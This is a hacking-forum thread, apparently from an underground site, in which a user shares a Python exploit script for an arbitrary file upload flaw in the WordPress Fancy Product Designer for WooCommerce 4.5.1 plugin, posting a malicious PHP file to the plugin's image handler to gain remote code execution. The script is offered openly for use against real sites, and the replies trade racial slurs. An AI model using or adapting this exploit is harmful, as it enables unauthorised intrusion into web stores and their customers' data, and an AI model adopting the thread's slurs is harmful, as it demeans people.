Wordpress - Fancy Product Designer For WooCommerce 4.5.1 File Upload Exploit
by 303 - Tuesday December 3, 2024 at 01:08 AM
#1
Hello Everyone, today i am sharing my private exploit for Woocommerce 4.5.1 of Fancy product designer.
This exploits allows the attacker to upload a malicious file, leading into rce.

This exploit its totally private and made by me.

For this vulnerability theres no public functional exploit.

Hope you like it!

## Vulnerable software: WordPress Fancy Product Designer For WooCommerce 4.5.1 File Upload ## vulnerability details: The plugin does not properly sanitize and validate uploaded files, leading to arbitrary file uploads. ## exploit author: 303 import os import requests import argparse import threading # Create an argument parser argparse = argparse.ArgumentParser(description='WordPress Fancy Product Designer For WooCommerce 4.5.1 File Upload Exploit') # Add required arguments argparse.add_argument('-u', '--url', required=True, help='Target WordPress URL') argparse.add_argument('-f', '--file', required=True, help='Path to malicious PHP file') argparse.add_argument('--check', action='store_true', help='Check if the target has a vulnerability') # Parse the arguments args = argparse.parse_args() url = args.url file = args.file check = args.check print (''' ________ _______  ________                                    .__  __          \_____  \\  _  \ \_____  \    ______ ____  ____  __ _________|__|/  |_ ___.__.   _(__  </  /_\  \  _(__  <  /  ___// __ \_/ ___\|  |  \_  __ \  \  __<  |  | /      \  \_/  \/      \  \___ \\  ___/\  \___|  |  /|  | \/  ||  |  \___  | /______  /\_____  /______  / /____  >\___  >\___  >____/ |__|  |__||__|  / ____|       \/      \/      \/      \/    \/    \/                      \/    >--------------------------------------------->       fuck feds <3 ┌─────────────────────────────────────────────┐''') def exploit(url, file):     # Construct the URL where we will exploit the vulnerability     target_url = f'{url}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'     # Read the malicious PHP file     with open(file, 'rb') as f:         payload = f.read()     # Send the file to the vulnerable endpoint     response = requests.post(target_url, files={'file': payload})     if response.status_code == 200:         print(f'[+] Exploit successful. File uploaded to {url}/wp-content/uploads/fancy_products_uploads/')     else:         print(f'[-] Exploit failed with status code {response.status_code}')         ## params post         params = {             "saveOnServer": "1",             "uploadsDirURL": "<your_target_url>/wp-content/uploads/fancy_products_uploads/", ## target url             "uploadsDirPath": "/wp-content/uploads/fancy_products_uploads/",  ## path where you upload the file on target.             "url": "", ## url where you host the image (own server)         } def checking_vulnerability(url):     # Check if the target has a vulnerability     response = requests.get(f'{url}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php')     if response.status_code == 200:         print(f'[+] Target {url} has a vulnerability to the WordPress Fancy Product Designer For WooCommerce 4.5.1 File Upload vulnerability')     else:         print(f'[-] Target {url} does not have a vulnerability to the WordPress Fancy Product Designer For WooCommerce 4.5.1 File Upload vulnerability') def threading_exploit(url, file):     threading.Thread(target=exploit, args=(url, file)).start() if check:     checking_vulnerability(url) else:     if os.path.isfile(file):         threading_exploit(url, file)         print(f'[+] Thread started')     else:         print('[-] File not found')
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
#2
+++++ good thread nigger
Ban reason: Self-Ban | Retired |http://raiddfzn73ir6iyxlf7nwytnujiflddog75yhtyk2y6qr3sbtvds7hqd.onion/Forum-Ban-Appeals if you wish to be unbanned in the future. (Permanent)
Reply
#3
(12-03-2024, 01:13 AM)Sukob Wrote: +++++ good thread nigger


thanks nigger :Terry:
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
#4
Thank you for your exploit. Do you have a video to learn to use your exploit ? Best Regards
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  new wordpress website takeover vuln (video + poc ) zinzeur 312 27,291 03-28-2026, 02:43 AM
Last Post: toshi99
  Ban Any Discord Exploit PhineasFisher 6 301 02-08-2026, 11:49 PM
Last Post: skype
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 266 02-06-2026, 07:08 PM
Last Post: hacker0123
  WordPress LFI to RCE - CVE-2025-0366 Serious 1 463 02-05-2026, 09:53 AM
Last Post: Sammm89
  New Zer0 Day Wordpress A3g00n 77 2,634 02-05-2026, 01:46 AM
Last Post: StrangeVest



 Users browsing this thread: 1 Guest(s)